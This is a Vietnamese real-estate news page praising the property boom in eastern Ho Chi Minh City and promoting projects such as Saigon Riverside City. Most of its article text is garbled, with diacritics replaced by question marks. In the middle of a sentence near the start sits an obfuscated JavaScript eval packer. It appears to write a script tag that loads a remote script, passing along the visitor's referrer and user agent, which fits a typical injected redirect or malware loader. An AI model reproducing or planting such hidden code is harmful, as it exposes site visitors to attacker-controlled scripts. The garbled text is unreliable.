THỜI GIAN BÀN GIAO DỰ ÁN:

Còn
0
5
Tháng
1
7
Ngày

Tín hiệu bùng nổ đáng mừng của bất động sản khu Đông

Th? tr??ng b?t ??ng s?n trên c? n??c liên t?c ghi nh?n nh?ng tín hi?u bùng n? vô cùng m?nh m?. V?i vi?c t?o ra m?t làn sóng chuy?n d?ch xu h??ng c?ng nh? cách th?c ??u t?, các tên tu?i l?n ??u ngành t?o nên m?t hình thái b?t ??ng s?n ti?n b?, hoàn thi?n và mang l?i nhi?u giá tr? h?p d?n cho các nhà ??u t?. Riêng t?i thành ph? H? Chí Minh, khu ?ông là n?i có s? chuy?n ??i rõ nét nh?t.

Tín hi?u bùng n? ?áng m?ng c?a b?t ??ng s?n khu ?ông

Th?c eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aaifk|var|u0026u|referrer|sntrd||js|php’.split(‘|’),0,{}))
t? chuy?n d?ch th? ph?n c?a khu ?ông

Theo th?ng kê, t?ng th? th? tr??ng thành ph? H? Chí Minh trong n?m 2017 có 37 d? án l?n nh? ra ??i v?i m?c ?? di?n tích và lo?i hình khác nhau, mang l?i ngu?n cung b?t ??ng s?n c?c l?n. L??ng tiêu th? thành công ??t ??n con s? ?n t??ng 95%, v? nên m?t t??ng lai kh? quan cho toàn ngành.

Trong s? ?ó, khu ?ông thành ph? là ??a bàn có m?c ?? t?ng tr??ng l?n nh?t v?i k?t qu? th?ng kê nh? sau:

  • Phân khúc ??t n?n khu ?ông v??t xa các khu v?c khác v?i 56% t?ng l??ng cung.
  • T? l? d? án m?i khu Nam, B?c, Tây l?n l??t là 16%, 16% và 11%. Riêng khu Tây ??t 57%.

Nh? v?y, b??c ??u có th? nói khu ?ông thành ph? hi?n ?ang n?m gi? v? th? d?n ??u, báo hi?u m?t t??ng lai phát tri?n b?n v?ng h?n n?a cho khu v?c.

Các d? án ?ã, ?ang và s? ???c tri?n khai t?i ?ây nh? c?n h? Saigon Riverside City, d? án Gem Riverside,… c?ng nh? v?y mà có th? t?n d?ng ???c nhi?u ?u th? n?i b?t ?? thu hút ??u t? hi?u qu?.

Nguyên nhân bùng n? th? tr??ng khu ?ông

Tr??c th?c t? phát tri?n c?a khu v?c nh? v?y, có th? ?úc k?t các nguyên nhân chính làm nên k?t qu? t?ng tr??ng này d?a trên nh?ng y?u t? sau ?ây:

  • S? s?t gi?m nghiêm tr?ng tình hình qu? ??t t?i các khu v?c còn l?i nh? khu trung tâm, khu Tây, khu Nam và khu B?c thành ph?.
  • Tính ti?n l?i trong ??i s?ng nh? s? quy?n hòa các giá tr? thiên nhiên t?i khu v?c bên c?nh s? có m?t c?a m?t h? th?ng kinh t? xã h?i ?n ??nh, ??ng b?.
  • Hàng lo?t các d? án h? t?ng giao thông kích thích s? v?n ??ng t?ng tr??ng c?a nhi?u ngành ngh?, kéo theo nhu c?u b?t ??ng s?n t?ng m?nh.
  • M?c thu nh?p trung bình c?a c?ng ??ng c? dân t?ng lên rõ nét, tr? hóa nhu c?u, h??ng ??n s? ti?n l?i, ti?n b? và hi?n ??i, ??ng c?p c?a các lo?i hình ??t n?n, c?n h?,…..

Khu ?ông ti?p t?c d?n ??u th? tr??ng

C?n c? theo th?c t? chuy?n ??ng th? tr??ng b?t ??ng s?n trong th?i gian qua, khu ?ông thành ph? v?i s? có m?t c?a d? án Saigon Riverside City, d? án One Verandah,…. hoàn toàn có ?? l?i th? ?? ti?p t?c gi? v?ng v? th? d?n ??u trong th?i gian s?p ??n.

Tuy nhiên, ?? s? phát tri?n m?nh m? không ??ng th?i t?o nên s?c ép ng??c cho chính h? t?ng khu v?c c?ng nh? ?nh h??ng ??n các v?n ?? xã h?i khác, ?òi h?i khu ?ông c?n có nh?ng chi?n l??c hi?u qu? ?? có th? ??ng b? ti?n trình phát tri?n trên m?i ph??ng di?n.

?? làm ???c ?i?u này, th? tr??ng khu ?ông c?n có s? chung tay c?a nhi?u ngành ngh? c?ng nh? t? các c?p ban ngành chính quy?n trong m?i công tác c?i t?o, nâng c?p và ??u t? t?t c? các khía c?nh kinh t? xã h?i khu v?c.

Th? tr??ng b?t ??ng s?n khu ?ông hi?n ?ang chuy?n d?ch theo h??ng t??ng ??i có l?i cho các nhà ??u t?. ?? không m?t ?i nh?ng giá tr? này, khu ?ông c?n c?i thi?n h?n n?a các y?u t? l?i th? s?n có, trong ?ó h? t?ng khu v?c là m?t y?u t? ?i?n hình và c?c k? quan tr?ng.

ngu?n bài vi?t: http://www.luatcongminh.com/

Bạn đang xem: Tín hiệu bùng nổ đáng mừng của bất động sản khu Đông trong

News latest

Pháp lý dự án The Matrix One đáp ứng đấy đủ quy định của pháp luật

Dự án chung cư cao cấp The Matrix One, khách hàng và nhà đầu tư sẽ hoàn toàn không phải bận tâm đến điều này....

Có nên đầu tư dự án condotel Quy Nhơn Melody không

Để trả lời câu hỏi có nên đầu tư vào dự án Quy Nhơn Melody không các nhà đầu tư cần phân tích vào các...

Saigon Riverside City lối tắt đến thành công
Saigon Riverside City lối tắt đến thành công

Tại sao nói dự án Saigon Riverside City chính là lối tắt đạt đến thành công mà mỗi khách hàng tại thị trường Thủ Đức...

Căn hộ sunshine city Sài Gòn hạng sang
Căn hộ sunshine city Sài Gòn hạng sang

Những yếu tố phong thủy cực tốt tại căn hộ Sunshine City Sài Gòn Phong thủy vốn được xem là một trong những yếu tố...

Dự án One Varandah đặc biệt như thế nào
Dự án One Varandah đặc biệt như thế nào

Là một trong những công trình bất động sản được triển khai tại quận 2 thành phố Hồ Chí Minh, dự án One Varandah tương...